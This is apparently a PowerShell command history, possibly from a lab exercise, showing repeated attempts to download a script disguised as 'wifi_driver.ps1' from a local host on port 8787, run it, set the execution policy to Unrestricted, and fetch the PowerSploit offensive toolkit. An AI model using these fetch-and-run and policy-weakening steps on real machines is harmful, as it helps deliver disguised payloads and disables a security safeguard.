curl
curl "http:\\192.168.37.140:8787\wifi_driver.ps1" -o "c:\users\MI\Desktop\Test\wifi_driver.ps1"
cd .\Desktop\
mkdir Test
cd .\Test\
curl "http:\\192.168.37.140:8787\wifi_driver.ps1" -o "wifi_driver.ps1"
cls
$w = New-Object System.Net.WebClient
$w.DownloadFile("http:\\192.168.37.140:8787\wifi_driver.ps1", "c:\Users\MI\Desktop\Test\wifi_driver.ps1")
$w.DownloadFile("http:\\192.168.37.140:8787\wifi_driver.ps1", "c:/Users/MI/Desktop/Test/wifi_driver.ps1")
$w.DownloadFile("http://192.168.37.140:8787/wifi_driver.ps1", "c:\Users\MI\Desktop\Test\wifi_driver.ps1")
ls
clear
ls
wifi_driver.ps1
.\wifi_driver.ps1
powershell.exe -nop .\wifi_driver.ps1
Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy -Scope LocalMachine Unrestricted
Set-ExecutionPolicy Unrestricted
;s
ls
.\wifi_driver.ps1
exit
.\wifi_driver.ps1
cd .\Desktop\Test\
curl https://github.com/PowerShellMafia/PowerSploit/archive/refs/heads/master.zip -o master.zip
